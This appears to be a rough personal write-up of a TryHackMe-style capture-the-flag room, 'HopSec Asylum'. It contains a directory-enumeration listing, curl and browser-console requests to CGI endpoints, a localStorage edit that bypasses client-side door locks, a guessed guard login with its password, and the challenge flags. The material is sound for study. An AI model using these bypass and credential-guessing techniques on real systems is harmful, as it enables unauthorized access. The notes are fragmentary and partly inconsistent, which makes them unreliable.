200  http://10.67.132.175:13400/cgi-bin/startpage.php
200  http://10.67.132.175:13400/cgi-bin/spaw.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/owa.sh
200  http://10.67.132.175:13400/cgi-bin/stuff.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/how.sh
200  http://10.67.132.175:13400/cgi-bin/style_emoticons.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/import
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/index_admin.php
200  http://10.67.132.175:13400/cgi-bin/sub-login.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/install-xoffers.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/PMA
200  http://10.67.132.175:13400/cgi-bin/tmpl.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/popular.js
200  http://10.67.132.175:13400/cgi-bin/trade
200  http://10.67.132.175:13400/cgi-bin/trac.sh
200  http://10.67.132.175:13400/cgi-bin/tpl.sh
200  http://10.67.132.175:13400/cgi-bin/typolight
200  http://10.67.132.175:13400/cgi-bin/tx.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/privmsg.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/product_image.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/priv.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/product-sort.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/promotions.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/layout.js
200  http://10.67.132.175:13400/cgi-bin/usr.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/lunch_menu
200  http://10.67.132.175:13400/cgi-bin/usercp2.js
200  http://10.67.132.175:13400/cgi-bin/vuln
200  http://10.67.132.175:13400/cgi-bin/web-beans.sh
200  http://10.67.132.175:13400/cgi-bin/webstat
200  http://10.67.132.175:13400/cgi-bin/whitepaper.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/microsoft.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/roller
200  http://10.67.132.175:13400/cgi-bin/working.js
200  http://10.67.132.175:13400/cgi-bin/will.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/rtf
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/mstpre.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/msadc.sh
200  http://10.67.132.175:13400/cgi-bin/xd_receiver.js
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/scriptlet.sh
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/temp
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/ur-admin.php
200  http://10.67.132.175:13400/cgi-bin/cgi-bin/cgi-bin/slabel



>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>



//Test login response
curl -X POST http://sq2.thm:8080/cgi-bin/login.sh -d 'username=hopkins&password=test'

<!doctype html>
<html><body>Invalid username or password</body></html>


//I found these lines in the source code for the psych door:
const endpoint=currentDoor==="psych"?"/cgi-bin/psych_check.sh":"/cgi-bin/exit_check.sh";
try{
  const res=await fetch(endpoint,{
    method:"POST",
    headers:{"Content-Type":"application/x-www-form-urlencoded"},
    body:"code="+encodeURIComponent(secret)
  });


2025-12-27 15:26:40 EST -- 
//Check Reponse
curl -s -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "code=r3m3mb3r_m3" http://$ip:8080/cgi-bin/psych_check.sh
{"ok":false}

#Step-by-Step
##Step1:
//Visit the web app again:
http://sq2.thm:8080

##Step2:
//Unlock Flag 1
fetch("/cgi-bin/key_flag.sh?door=hopper").then(r => r.json()).then(console.log);

##Step3:
//Submit Psych keycode
fetch("/cgi-bin/psych_check.sh", {
  method: "POST",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "code=r3m3mb3r_m3"
}).then(r => r.json()).then(console.log);

//Get local storage
localStorage.getItem("hopsec_unlocked_v1");

//Set local storage 
localStorage.setItem("hopsec_unlocked_v1", '{"hopper":true,"psych":true,"exit":true}');

//Remove local storage
localStorage.removeItem("hopsec_unlocked_v1");

//Shows Door Access: Psych Ward Exit
openDoor('psych')


//Bypass the front end
document.getElementById("loginWindow").style.display = "none";
document.getElementById("mapScreen").style.display = "block";


##Login Success!!
//NOTE: I just played around the usernames and passwords until I figured it out.
curl -X POST http://10.67.132.175:13401/v1/auth/login -H "Content-Type: application/json" -d '{"username":"guard.hopkins@hopsecasylum.com","password":"Johnnyboy1982!"}'
{"facility":"HopSec Asylumn","profile":{"role":"guard","username":"guard.hopkins@hopsecasylum.com"},"token":"{\"sub\": \"guard.hopkins@hopsecasylum.com\", \"role\": \"guard\", \"iat\": 1766976044}.ae56a447564050aae35dcde4b5d70bb4087b4314392ec134e74f8c0b8c8fe4fa"}

//guard.hopkins@hopsecasylum.com:Johnnyboy1982!




## Escape!
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

// 1. Unlock Hopper’s Cell
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Your escape begins in the Cells and Storage area. Hopper is locked inside, and the door is secured with a digital lock. Your first task is to access the cell controls and unlock his door. Once Hopper is free, you can begin moving toward the lobby.

//I found this line in the source code for hoppers door:
// const res=await fetch("/cgi-bin/key_flag.sh?door=hopper")

2025-12-27 14:04:50 EST -- 
curl http://$ip:8080/cgi-bin/key_flag.sh?door=hopper
{"ok":true,"flag":"THM{h0pp1ing_m4d}"}

//THM{h0pp1ing_m4d}

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//2. Move Through the Lobby
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

With the cell unlocked, head straight ahead into the lobby. This area connects the different blocks of the facility. Cameras are active, so stay alert. Your objective is to reach the Psych Ward entrance on the east side of the lobby.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//3. Bypass the Psych Ward Keypad
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

The Psych Ward is protected by a keypad system. You must identify the correct code or exploit the keypad to continue. Once the keypad is bypassed, you will gain access to the Psych Ward Exit hallway.


// Step01: Attempt to Unlock Psych Door (Flag 2)
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

#Found URI in source code:
Submit the correct code to /cgi-bin/psych_check.sh to unlock the Psych Ward and receive Flag 2.

## Brute-force not viable:
	//Psych door is protected by server-side rate (camera) limiting (30s delay).
	//Threaded brute-force scripts were too slow.

//NOTE: Not even going to list how many times and what methods I tried.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Step02: Switch to Web Console / Static Analysis
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//Attempt manual guesses:
fetch("/cgi-bin/psych_check.sh", {
  method: "POST",
  headers: { "Content-Type": "application/x-www-form-urlencoded" },
  body: "code=1234"
}).then(res => res.json()).then(console.log)
Promise { <state>: "pending" }

Object { ok: false }

//Tried multiple guesses:

hopkins, 1234, m4d, h0pp1ing, hoppermad, blahblahblah...etc

//All False

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


// Step03: Dig into JavaScript Logic
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

//submitDoorSecret.toString()
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
`async function submitDoorSecret(){
  if(currentDoor!=="psych"&&currentDoor!=="exit")return;
  const secret=document.getElementById("doorSecret").value.trim();
  const e=document.getElementById("doorError");
  const s=document.getElementById("doorSuccess");
  e.textContent="";
  s.innerHTML="";
  s.style.display="none";
  if(!secret){
    e.textContent="Please enter a code.";
    return;
  }
  const endpoint=currentDoor==="psych"?"/cgi-bin/psych_check.sh":"/cgi-bin/exit_check.sh";
  try{
    const res=await fetch(endpoint,{
      method:"POST",
      headers:{"Content-Type":"application/x-www-form-urlencoded"},
      body:"code="+encodeURIComponent(secret)
    });
    const data=await res.json();
    if(data&&data.error==="rate_limit"){
      e.textContent="Too many attempts. Please wait and try again.";
      return;
    }
    if(!data||!data.ok){
      e.textContent="Invalid code.";
      return;
    }
    const flag=data.flag||"";
    let html="";
    if(currentDoor==="psych"){
      html+='<div><strong>Psych Ward exit keycode accepted.</strong></div>';
      html+='<p style="margin:6px 0 4px;font-size:12px;">This is only the first part of your second flag. You will need to complete it elsewhere.</p>';
      if(flag){
        html+='<div class="flag-row"><span class="flag" id="psychFlagText"></span><button class="copybtn" onclick="copyById(\\'psychFlagText\\')">Copy</button></div>';
      }
      markUnlocked("psych");
    }else{
      html+='<div><strong>Asylum Exit SCADA passcode accepted.</strong></div>';
      if(flag){
        html+='<div class="flag-row"><span class="flag" id="exitFlagText"></span><button class="copybtn" onclick="copyById(\\'exitFlagText\\')">Copy</button></div>';
      }
      markUnlocked("exit");
    }
    s.innerHTML=html;
    s.style.display="block";
    if(currentDoor==="psych"&&flag){
      const span=document.getElementById("psychFlagText");
      if(span)span.textContent=flag;
    }
    if(currentDoor==="exit"&&flag){
      const span=document.getElementById("exitFlagText");
      if(span)span.textContent=flag;
    }
  }catch(err){
    e.textContent="Error contacting server.";
  }
}`
>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

Confirmed flag is inserted only if the right code is entered and data.ok === true.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

localStorage.setItem("hopsec_unlocked_v1", JSON.stringify({
  hopper: true,
  psych: true,
  exit: true
}));
location.reload(); // Triggers full unlock and shows escape door



// Step04: Look for Developer Test Hooks
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
Used console search to look for functions that might expose flags.

devTestPsych()


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//This opens a keycode
openDoor('psych')


body: "flag1=THM{h0pp1ing_m4d}&flag2=THM{d34d_bu7_n07}&flag3=THM{g0n3_f0r3v3r}"

body: "flag1=THM{h0pp1ing_m4d}&flag2=THM{d34d_bu7_n07_f0rg3773n_4ft3r}&flag3=THM{g0n3_f0r3v3r}"



Flag 1: THM{h0pp1ing_m4d}
Flag 2 (partial): THM{d34d_bu7_n07
Flag 3: Not yet obtained


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//4. Reach the Main Corridor
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

From the Psych Ward Exit you can move south and loop around into the Main Corridor. This is the final section of the escape route. The last challenge awaits here, and completing it will open the final exit door.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


//5. Escape the Facility
<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<

Solve the final challenge in the Main Corridor and make your way toward the exit marked on the map. Once the door opens, Hopper is free, and the escape is complete.

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>

>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>


